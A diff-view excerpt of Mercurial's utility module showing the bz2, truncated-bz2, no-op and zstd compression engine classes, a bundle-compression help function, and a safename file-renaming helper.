3573 3578 compengines.register(_zlibengine())
3574 3579
3575 3580 class _bz2engine(compressionengine):
3576 3581 def name(self):
3577 3582 return 'bz2'
3578 3583
3579 3584 def bundletype(self):
3580 3585 """An algorithm that produces smaller bundles than ``gzip``.
3581 3586
3582 3587 All Mercurial clients should support this format.
3583 3588
3584 3589 This engine will likely produce smaller bundles than ``gzip`` but
3585 3590 will be significantly slower, both during compression and
3586 3591 decompression.
3587 3592
3588 3593 If available, the ``zstd`` engine can yield similar or better
3589 3594 compression at much higher speeds.
3590 3595 """
3591 3596 return 'bzip2', 'BZ'
3592 3597
3593 3598 # We declare a protocol name but don't advertise by default because
3594 3599 # it is slow.
3595 3600 def wireprotosupport(self):
3596 3601 return compewireprotosupport('bzip2', 0, 0)
3597 3602
3598 3603 def compressstream(self, it, opts=None):
3599 3604 opts = opts or {}
3600 3605 z = bz2.BZ2Compressor(opts.get('level', 9))
3601 3606 for chunk in it:
3602 3607 data = z.compress(chunk)
3603 3608 if data:
3604 3609 yield data
3605 3610
3606 3611 yield z.flush()
3607 3612
3608 3613 def decompressorreader(self, fh):
3609 3614 def gen():
3610 3615 d = bz2.BZ2Decompressor()
3611 3616 for chunk in filechunkiter(fh):
3612 3617 yield d.decompress(chunk)
3613 3618
3614 3619 return chunkbuffer(gen())
3615 3620
3616 3621 compengines.register(_bz2engine())
3617 3622
3618 3623 class _truncatedbz2engine(compressionengine):
3619 3624 def name(self):
3620 3625 return 'bz2truncated'
3621 3626
3622 3627 def bundletype(self):
3623 3628 return None, '_truncatedBZ'
3624 3629
3625 3630 # We don't implement compressstream because it is hackily handled elsewhere.
3626 3631
3627 3632 def decompressorreader(self, fh):
3628 3633 def gen():
3629 3634 # The input stream doesn't have the 'BZ' header. So add it back.
3630 3635 d = bz2.BZ2Decompressor()
3631 3636 d.decompress('BZ')
3632 3637 for chunk in filechunkiter(fh):
3633 3638 yield d.decompress(chunk)
3634 3639
3635 3640 return chunkbuffer(gen())
3636 3641
3637 3642 compengines.register(_truncatedbz2engine())
3638 3643
3639 3644 class _noopengine(compressionengine):
3640 3645 def name(self):
3641 3646 return 'none'
3642 3647
3643 3648 def bundletype(self):
3644 3649 """No compression is performed.
3645 3650
3646 3651 Use this compression engine to explicitly disable compression.
3647 3652 """
3648 3653 return 'none', 'UN'
3649 3654
3650 3655 # Clients always support uncompressed payloads. Servers don't because
3651 3656 # unless you are on a fast network, uncompressed payloads can easily
3652 3657 # saturate your network pipe.
3653 3658 def wireprotosupport(self):
3654 3659 return compewireprotosupport('none', 0, 10)
3655 3660
3656 3661 # We don't implement revlogheader because it is handled specially
3657 3662 # in the revlog class.
3658 3663
3659 3664 def compressstream(self, it, opts=None):
3660 3665 return it
3661 3666
3662 3667 def decompressorreader(self, fh):
3663 3668 return fh
3664 3669
3665 3670 class nooprevlogcompressor(object):
3666 3671 def compress(self, data):
3667 3672 return None
3668 3673
3669 3674 def revlogcompressor(self, opts=None):
3670 3675 return self.nooprevlogcompressor()
3671 3676
3672 3677 compengines.register(_noopengine())
3673 3678
3674 3679 class _zstdengine(compressionengine):
3675 3680 def name(self):
3676 3681 return 'zstd'
3677 3682
3678 3683 @propertycache
3679 3684 def _module(self):
3680 3685 # Not all installs have the zstd module available. So defer importing
3681 3686 # until first access.
3682 3687 try:
3683 3688 from . import zstd
3684 3689 # Force delayed import.
3685 3690 zstd.__version__
3686 3691 return zstd
3687 3692 except ImportError:
3688 3693 return None
3689 3694
3690 3695 def available(self):
3691 3696 return bool(self._module)
3692 3697
3693 3698 def bundletype(self):
3694 3699 """A modern compression algorithm that is fast and highly flexible.
3695 3700
3696 3701 Only supported by Mercurial 4.1 and newer clients.
3697 3702
3698 3703 With the default settings, zstd compression is both faster and yields
3699 3704 better compression than ``gzip``. It also frequently yields better
3700 3705 compression than ``bzip2`` while operating at much higher speeds.
3701 3706
3702 3707 If this engine is available and backwards compatibility is not a
3703 3708 concern, it is likely the best available engine.
3704 3709 """
3705 3710 return 'zstd', 'ZS'
3706 3711
3707 3712 def wireprotosupport(self):
3708 3713 return compewireprotosupport('zstd', 50, 50)
3709 3714
3710 3715 def revlogheader(self):
3711 3716 return '\x28'
3712 3717
3713 3718 def compressstream(self, it, opts=None):
3714 3719 opts = opts or {}
3715 3720 # zstd level 3 is almost always significantly faster than zlib
3716 3721 # while providing no worse compression. It strikes a good balance
3717 3722 # between speed and compression.
3718 3723 level = opts.get('level', 3)
3719 3724
3720 3725 zstd = self._module
3721 3726 z = zstd.ZstdCompressor(level=level).compressobj()
3722 3727 for chunk in it:
3723 3728 data = z.compress(chunk)
3724 3729 if data:
3725 3730 yield data
3726 3731
3727 3732 yield z.flush()
3728 3733
3729 3734 def decompressorreader(self, fh):
3730 3735 zstd = self._module
3731 3736 dctx = zstd.ZstdDecompressor()
3732 3737 return chunkbuffer(dctx.read_from(fh))
3733 3738
3734 3739 class zstdrevlogcompressor(object):
3735 3740 def __init__(self, zstd, level=3):
3736 3741 # Writing the content size adds a few bytes to the output. However,
3737 3742 # it allows decompression to be more optimal since we can
3738 3743 # pre-allocate a buffer to hold the result.
3739 3744 self._cctx = zstd.ZstdCompressor(level=level,
3740 3745 write_content_size=True)
3741 3746 self._dctx = zstd.ZstdDecompressor()
3742 3747 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3743 3748 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3744 3749
3745 3750 def compress(self, data):
3746 3751 insize = len(data)
3747 3752 # Caller handles empty input case.
3748 3753 assert insize > 0
3749 3754
3750 3755 if insize < 50:
3751 3756 return None
3752 3757
3753 3758 elif insize <= 1000000:
3754 3759 compressed = self._cctx.compress(data)
3755 3760 if len(compressed) < insize:
3756 3761 return compressed
3757 3762 return None
3758 3763 else:
3759 3764 z = self._cctx.compressobj()
3760 3765 chunks = []
3761 3766 pos = 0
3762 3767 while pos < insize:
3763 3768 pos2 = pos + self._compinsize
3764 3769 chunk = z.compress(data[pos:pos2])
3765 3770 if chunk:
3766 3771 chunks.append(chunk)
3767 3772 pos = pos2
3768 3773 chunks.append(z.flush())
3769 3774
3770 3775 if sum(map(len, chunks)) < insize:
3771 3776 return ''.join(chunks)
3772 3777 return None
3773 3778
3774 3779 def decompress(self, data):
3775 3780 insize = len(data)
3776 3781
3777 3782 try:
3778 3783 # This was measured to be faster than other streaming
3779 3784 # decompressors.
3780 3785 dobj = self._dctx.decompressobj()
3781 3786 chunks = []
3782 3787 pos = 0
3783 3788 while pos < insize:
3784 3789 pos2 = pos + self._decompinsize
3785 3790 chunk = dobj.decompress(data[pos:pos2])
3786 3791 if chunk:
3787 3792 chunks.append(chunk)
3788 3793 pos = pos2
3789 3794 # Frame should be exhausted, so no finish() API.
3790 3795
3791 3796 return ''.join(chunks)
3792 3797 except Exception as e:
3793 3798 raise error.RevlogError(_('revlog decompress error: %s') %
3794 3799 str(e))
3795 3800
3796 3801 def revlogcompressor(self, opts=None):
3797 3802 opts = opts or {}
3798 3803 return self.zstdrevlogcompressor(self._module,
3799 3804 level=opts.get('level', 3))
3800 3805
3801 3806 compengines.register(_zstdengine())
3802 3807
3803 3808 def bundlecompressiontopics():
3804 3809 """Obtains a list of available bundle compressions for use in help."""
3805 3810 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3806 3811 items = {}
3807 3812
3808 3813 # We need to format the docstring. So use a dummy object/type to hold it
3809 3814 # rather than mutating the original.
3810 3815 class docobject(object):
3811 3816 pass
3812 3817
3813 3818 for name in compengines:
3814 3819 engine = compengines[name]
3815 3820
3816 3821 if not engine.available():
3817 3822 continue
3818 3823
3819 3824 bt = engine.bundletype()
3820 3825 if not bt or not bt[0]:
3821 3826 continue
3822 3827
3823 3828 doc = pycompat.sysstr('``%s``\n %s') % (
3824 3829 bt[0], engine.bundletype.__doc__)
3825 3830
3826 3831 value = docobject()
3827 3832 value.__doc__ = doc
3828 3833 value._origdoc = engine.bundletype.__doc__
3829 3834 value._origfunc = engine.bundletype
3830 3835
3831 3836 items[bt[0]] = value
3832 3837
3833 3838 return items
3834 3839
3835 3840 i18nfunctions = bundlecompressiontopics().values()
3836 3841
3837 3842 # convenient shortcut
3838 3843 dst = debugstacktrace
3839 3844
3840 3845 def safename(f, tag, ctx, others=None):
3841 3846 """
3842 3847 Generate a name that it is safe to rename f to in the given context.
3843 3848
3844 3849 f: filename to rename
3845 3850 tag: a string tag that will be included in the new name
3846 3851 ctx: a context, in which the new name must not exist
3847 3852 others: a set of other filenames that the new name must not be in
3848 3853
3849 3854 Returns a file name of the form oldname~tag[~number] which does not exist
3850 3855 in the provided context and is not in the set of other names.
3851 3856 """
3852 3857 if others is None:
3853 3858 others = set()
3854 3859
3855 3860 fn = '%s~%s' % (f, tag)
3856 3861 if fn not in ctx and fn not in others:
3857 3862 return fn
3858 3863 for n in itertools.count(1):
3859 3864 fn = '%s~%s~%s' % (f, tag, n)
3860 3865 if fn not in ctx and fn not in others:
3861 3866 return fn
General Comments 0
You need to be logged in to leave comments. Login now